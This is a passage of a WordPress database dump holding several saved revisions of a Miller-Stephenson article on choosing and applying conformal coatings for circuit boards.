src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\n&nbsp;\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n 	<li>Brushing – requires extremely proficient and skilled operators in order to be suitable for production purposes</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-10 19:14:21', '2016-10-10 19:14:21', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2481, 3, '2016-10-10 19:14:56', '2016-10-10 19:14:56', 'Conformal coatings are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four class of conformal coating to choose from:\r\n<ul>\r\n 	<li><strong>ACRYLIC:</strong> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>SILCONE:</strong> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>URETHANE:</strong> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>VARNISH:</strong> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n 	<li>Brushing – requires extremely proficient and skilled operators in order to be suitable for production purposes</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-10 19:14:56', '2016-10-10 19:14:56', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2482, 3, '2016-10-10 19:15:33', '2016-10-10 19:15:33', 'Conformal coatings are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four class of conformal coating to choose from:\r\n<ul>\r\n 	<li><strong>ACRYLIC:</strong> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>SILCONE:</strong> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>URETHANE:</strong> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>VARNISH:</strong> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n 	<li>Brushing – requires extremely proficient and skilled operators in order to be suitable for production purposes</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-10 19:15:33', '2016-10-10 19:15:33', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2483, 3, '2016-10-10 19:16:28', '2016-10-10 19:16:28', 'Conformal coatings are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four class of conformal coating to choose from:\r\n<ul>\r\n 	<li><strong>ACRYLIC:</strong> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>SILCONE:</strong> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>URETHANE:</strong> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>VARNISH:</strong> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-10 19:16:28', '2016-10-10 19:16:28', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2484, 2, '2016-10-10 19:22:46', '2016-10-10 19:22:46', 'Conformal coatings are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four class of conformal coating to choose from:\r\n<ul>\r\n 	<li><strong>ACRYLIC:</strong> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>SILCONE:</strong> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>URETHANE:</strong> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>VARNISH:</strong> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Conformal Coating" ]', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-10 19:22:46', '2016-10-10 19:22:46', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2485, 2, '2016-10-10 19:23:28', '2016-10-10 19:23:28', 'Conformal coatings are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four class of conformal coating to choose from:\r\n<ul>\r\n 	<li><strong>ACRYLIC:</strong> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>SILCONE:</strong> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>URETHANE:</strong> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>VARNISH:</strong> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Conformal Coating" ]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Our entire line of conformal coatings can be found here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-10 19:23:28', '2016-10-10 19:23:28', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2486, 2, '2016-10-10 19:25:53', '2016-10-10 19:25:53', '<p>Conformal coatings are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.</p>\n<p>Conformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:</p>\n<ul>\n<li>Insulation: Allowing reduction in conductor spacing</li>\n<li>Eliminate the need for complex, sophisticated enclosures</li>\n<li>Minimal effect on component weight</li>\n<li>Completely protect the assembly against chemical and corrosive attack</li>\n<li>Eliminate potential performance degradation due to environmental hazards</li>\n<li>Minimize environmental stress on a PCB assembly</li>\n</ul>\n<p>As mentioned there are typically four class of conformal coating to choose from:</p>\n<ul>\n<li><strong>ACRYLIC:</strong> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\n</ul>\n<ul>\n<li><strong>SILCONE:</strong> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\n</ul>\n<ul>\n<li><strong>URETHANE:</strong> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\n</ul>\n<ul>\n<li><strong>VARNISH:</strong> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\n</ul>\n<p>Equally as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge</p>\n<p><img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" /></p>\n<p>The effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:</p>\n<ol>\n<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\n<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\n<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\n</ol>\n<p>The liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.</p>\n<p>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</p>\n<ul>\n<li>Simple application- Convenient aerosol or bulk</li>\n<li>Specialized formulas to provide uniform, thin films</li>\n<li>Easy removal, repair and replacement</li>\n<li>100% non-flammable; low odor formulations</li>\n<li>Superior Protection against thermal and mechanical shock</li>\n<li>MIL-Spec and Commerical-Spec polymer coatings</li>\n</ul>\n[ux_product_categories ids="29,28,27,30" number="10"]\n\n<p><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Our entire line of conformal coatings can be found here.</a></p>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-10 19:25:53', '2016-10-10 19:25:53', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2487, 2, '2016-10-10 19:26:36', '2016-10-10 19:26:36', 'Conformal coatings are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four class of conformal coating to choose from:\r\n<ul>\r\n 	<li><strong>ACRYLIC:</strong> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	